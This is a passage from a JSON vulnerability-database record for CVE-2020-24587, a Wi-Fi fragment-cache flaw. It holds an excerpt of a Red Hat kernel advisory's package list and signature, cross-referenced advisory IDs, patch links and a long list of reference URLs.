390x.rpm\nkernel-debug-devel-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-4.18.0-348.el8.s390x.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm\nkernel-devel-4.18.0-348.el8.s390x.rpm\nkernel-headers-4.18.0-348.el8.s390x.rpm\nkernel-modules-4.18.0-348.el8.s390x.rpm\nkernel-modules-extra-4.18.0-348.el8.s390x.rpm\nkernel-tools-4.18.0-348.el8.s390x.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm\nkernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm\nperf-4.18.0-348.el8.s390x.rpm\nperf-debuginfo-4.18.0-348.el8.s390x.rpm\npython3-perf-4.18.0-348.el8.s390x.rpm\npython3-perf-debuginfo-4.18.0-348.el8.s390x.rpm\n\nx86_64:\nbpftool-4.18.0-348.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-4.18.0-348.el8.x86_64.rpm\nkernel-core-4.18.0-348.el8.x86_64.rpm\nkernel-cross-headers-4.18.0-348.el8.x86_64.rpm\nkernel-debug-4.18.0-348.el8.x86_64.rpm\nkernel-debug-core-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-devel-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-4.18.0-348.el8.x86_64.rpm\nkernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-devel-4.18.0-348.el8.x86_64.rpm\nkernel-headers-4.18.0-348.el8.x86_64.rpm\nkernel-modules-4.18.0-348.el8.x86_64.rpm\nkernel-modules-extra-4.18.0-348.el8.x86_64.rpm\nkernel-tools-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-4.18.0-348.el8.x86_64.rpm\nperf-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nRed Hat Enterprise Linux CRB (v. 8):\n\naarch64:\nbpftool-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm\nperf-debuginfo-4.18.0-348.el8.aarch64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm\n\nppc64le:\nbpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm\nperf-debuginfo-4.18.0-348.el8.ppc64le.rpm\npython3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm\nkernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm\nperf-debuginfo-4.18.0-348.el8.x86_64.rpm\npython3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST\nFrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l\nbobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy\nSfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW\nHgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC\nDRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E\nlJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD\nJhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK\ndQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8\nzf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v\n1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN\n+PuV5cms0sE=2UUA\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-24587",
        "trust": 4.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/11/12",
        "trust": 2.5
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-24-074-07",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU93656033",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU93485736",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-102-04",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163249",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163599",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2021080305",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100407",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051814",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051915",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022041319",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051708",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051118",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2453",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2876",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3825",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2079",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2290",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2249",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4254",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1587",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2368",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3905",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2216",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1628",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163291",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-236-01",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-57316",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-61212",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-24587",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163251",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163253",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163301",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "id": "VAR-202105-1432",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5589185433333334
  },
  "last_update_date": "2024-07-23T21:12:24.589000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NV21-013",
        "trust": 0.8,
        "url": "https://www.ieee802.org/11/"
      },
      {
        "title": "Microsoft Windows Wireless Networking Fixes for encryption problem vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=152352"
      },
      {
        "title": "Red Hat: CVE-2020-24587",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2020-24587"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-24587 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-004"
      },
      {
        "title": "Cisco: Multiple Vulnerabilities in Frame Aggregation and Fragmentation Implementations of 802.11 Specification Affecting Cisco Products: May 2021",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-wifi-faf-22epcewu"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-002"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/kali973/fragattacks "
      },
      {
        "title": "fragattacks",
        "trust": 0.1,
        "url": "https://github.com/vanhoefm/fragattacks "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/wormable-windows-bug-dos-rce/166057/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-327",
        "trust": 1.0
      },
      {
        "problemtype": "Inappropriate cryptographic strength (CWE-326) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/11/12"
      },
      {
        "trust": 2.3,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-wifi-faf-22epcewu"
      },
      {
        "trust": 1.7,
        "url": "https://www.fragattacks.com"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/vanhoefm/fragattacks/blob/master/summary.md"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00473.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/12602-security-advisory-63"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00002.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu93485736/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu93656033/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-07"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.6,
        "url": "https://www.qualcomm.com/company/product-security/bulletins/august-2021-bulletin"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-61212"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021080305"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2876"
      },
      {
        "trust": 0.6,
        "url": "https://source.android.com/security/bulletin/2021-10-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1628"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-102-04"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2368"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021100407"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-236-01"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051814"
      },
      {
        "trust": 0.6,
        "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2020-24587"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/wi-fi-devices-multiple-vulnerabilities-via-fragattacks-35386"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051915"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051118"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022041319"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163599/ubuntu-security-notice-usn-5018-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1587"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-57316"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2136"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
      },
      {
        "trust": 0.6,
        "url": "https://device.harmonyos.com/cn/docs/security/update/security-bulletins-phones-202111-0000001218088197"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2079"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2453"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2290"
      },
      {
        "trust": 0.6,
        "url": "https://www.huawei.com/cn/psirt/security-notices/huawei-sn-20210513-01-fragattacks-cn"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051708"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24504"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.4,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4997-1"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
      },
      {
        "trust": 0.2,
